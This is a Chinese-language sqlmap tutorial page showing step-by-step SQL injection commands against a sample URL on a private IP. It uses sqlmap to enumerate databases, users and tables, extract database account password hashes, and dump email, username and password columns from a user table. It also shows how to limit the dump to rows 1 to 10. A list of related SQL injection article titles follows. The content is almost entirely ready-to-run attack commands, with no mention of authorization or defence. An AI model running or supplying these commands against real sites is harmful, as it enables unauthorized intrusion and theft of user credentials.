sql注入之——sqlmap教程
一、指定注入点
-u:指定注入点url
需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch
二、暴库
一条命令即可曝出该sqlserver中所有数据库名称,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs
参数:–dbs:dbs前面有两条杠,请看清楚。
三、web当前使用的数据库
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db
四、web数据库使用账户
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user
五、列出sqlserver所有用户
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users
六、数据库账户与密码
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords
七、列出数据库中的表
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables
参数:
-D:指定数据库名称
–tables:列出表
八、列出表中字段
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns
参数:
-D:指定数据库名称
-T:指定要列出字段的表
–columns:指定列出字段
九、暴字段内容
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump
参数:
-C :指定要暴的字段
–dump:将结果导出
如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:
C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump
参数:
–start:指定开始的行
–stop:指定结束的行
此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。
sql注入之——sqlmap教程相关推荐
- 详解强大的SQL注入工具——SQLMAP
本文转自:详解强大的SQL注入工具--SQLMAP 前言 Windows下的注入工具好的又贵,免费的啊D.明小子等又不好用,我们根本没必要花 时间去找什么破解的havij.pangolin什么的,特别 ...
- 渗透测试-SQL注入之sqlmap的使用方法及实战案例
SQL注入之sqlmap的使用方法及实战案例 文章目录 SQL注入之sqlmap的使用方法及实战案例 前言 一.sqlmap的使用方法 查库,表,列,以及相关的字段的信息 万能密码汇总 判断是否为字符 ...
- 视频教程-SQL注入与SQLmap工具-漏洞挖掘与利用
SQL注入与SQLmap工具 玄道,从混迹漏洞平台与SRC应急响应中心的白帽子到创业乙方的技术与运营 刘畅 ¥15.00 立即订阅 扫码下载「CSDN程序员学院APP」,1000+技术好课免费看 AP ...
- SQL注入之sqlmap入门教程
目录 一.判断是否存在注入点 二.查询当前用户下所有数据库 三.获取数据库中的表名 四.获取表中的字段名 五.获取字段内容 六.获取数据库的所有用户 七.获取数据库用户的密码 八.获取当前网站数据库的 ...
- sql注入之——SQLMap常见语句
填坑~~ SQLMap常见语句 首先要明确 整个的单词 需要用两个横杠– 缩写的单词 需要一个横杠- 参考:https://www.freebuf.com/sectool/164608.html 一. ...
- B站小迪安全笔记第十九天-SQL注入之sqlmap绕过waf
前言: 在攻防实战中,往往需要掌握一些特性,比如服务器.数据库.应用层.WAF层等,以便我们更灵活地去构造 Payload,从而可以和各种 WAF 进行对抗,甚至绕过安全防御措施进行漏洞利用. 演示案 ...
- Sql注入的入门教程
Sql注入比较常见的漏洞之一,例用程序员的漏洞来进行无账号的登陆,篡改数据库.任何客户端可控,传参数到服务端的变量,和数据库交互,都有可能存在sql注入 原理 用户通过构造sql语句来模仿服务器发向服 ...
- 自动化SQL注入工具-sqlmap
1.通过burpsuite.获取拦截到的请求,指定文件进行探测 python sqlmap.py -r target.txt --current-db 2.通过url地址进行探测 Python sql ...
- sql 注入神器sqlmap 源码分析之调试sqlmap
为什么80%的码农都做不了架构师?>>> 相信大家平时 用sqlmap 命令,比如 python sqlmap.py -u"https://team.oschina. ...
- 【无标题】【2023最新版】超详细Sqlmap安装保姆级教程,SQL注入使用指南,收藏这一篇就够了
一.sqlmap简介 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入.目前支持的数据库有MySql.Oracle.Access.PostageSQL. ...
最新文章
- 用 PHP 和 MySQL 保存和输出图片
- 工业交换机与工业路由器的区别
- 属于计算机病毒主要特征的是,[单选] 不属于计算机病毒的主要特征的是()
- Centos下安装Gcc和Qt
- 小程序-读取视频数据 每个N帧采样保存
- html文件如何转php文件,怎么把动态的php文件转换成静态的html文件,html文件是php文件…...
- lol人物模型提取(四)
- 百度开源呼叫中心系统
- Linux在sudo apt-get update或install时出现archive.ubuntu.com连接失败 [IP: 91.189.91.39 80]的错误解决方案
- 苹果v10模板需要几的php,苹果MACCMSv10源码模板安装常见问题
- FPGA学习笔记2.1——用Verilog实现74LS148的功能定义并测试
- 使用opencv的透视变换裁剪倾斜人脸
- 在第一次使用德国小鸡要注意的地方
- 使用烧杯进行缓存? 为什么要切换到dogpile.cache
- 华为鸿蒙升级表,华为鸿蒙手机升级计划表出炉!按麒麟芯片型号适配:你有份吗?...
- 远程桌面未找到远程计算机服务,电脑无法远程连接怎么办
- 北大青鸟深圳嘉华学校分享Hibernate查询
- linux的cuda10卸载,Ubuntu18.04下卸载CUDA11.0
- new ext.toolbar控制按钮间距_消防设施常见安装间距汇总
- 微软的东西,你不要删.否则学我的,重装系统.
热门文章
- spring4.0.0的配置和使用
- 前端开发面试题-JavaScript(一)
- 我的css reset
- 三言两语聊Python模块–文档测试模块doctest
- 安装无线网卡后,显示网络电缆被拔出?
- Python向数据库表格里插入万级数据
- C++对ascii文件按行和分隔符读取并显示
- 监测系统的cpu,物理内存,磁盘的使用
- 怎么获取php内的参数,php如何获取方法内的所有参数
- #ifndef HeaderName_h #define HeaderName_h #endif 使用详解